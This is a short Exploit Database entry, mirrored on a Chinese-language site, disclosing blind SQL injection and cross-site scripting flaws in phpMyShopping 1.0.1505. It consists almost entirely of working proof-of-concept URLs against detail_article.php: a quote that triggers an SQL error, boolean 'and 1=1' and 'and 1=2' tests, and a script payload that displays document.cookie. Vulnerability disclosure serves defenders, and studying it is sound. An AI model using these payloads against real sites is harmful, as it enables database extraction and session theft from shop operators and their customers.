phpMyShopping 1.0.1505 – Multiple Vulnerabilities

• Exploit Database
• 18 阅读

• 作者： Metropolis
  日期： 2010-10-01
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15173/

• ####################################################################
  .:. Author : Metropolis
  .:. Home : www.metropolis.fr.cr 
  .:. Script : PhpMyShopping 
  .:. Version : v1.0.1505
  .:. Download Script: http://www.phpmyshopping.org/night_build/PhpMyShopping_mono_boutique_v1.0.1505.tar.gz
  .:. Bug Type : Multiple Vulnerabilities / Blind SQL Injections / XSS 
  
  ####################################################################
   
  ===[ Blind Sql Injection ]===
   
  SQL Error =>
   
  /detail_article.php?C=3&P=7'
   
   www.site.com/detail_article.php?C=3&P=7 [Blind]
  
  [Demo] :
  
  www.site.com/detail_article.php?C=3&P=1 and 1=1 <-- true
  
  www.site.com/detail_article.php?C=3&P=1 and 1=2 <-- false
  
  ===[ XSS ]===
  
   www.site.com/detail_article.php?C=3&P=7 [XSS]
  
  [Demo] :
   
   www.site.com/detail_article.php?C=3&P=7"><script>alert(document.cookie);</script>
  
  
   ####################################################################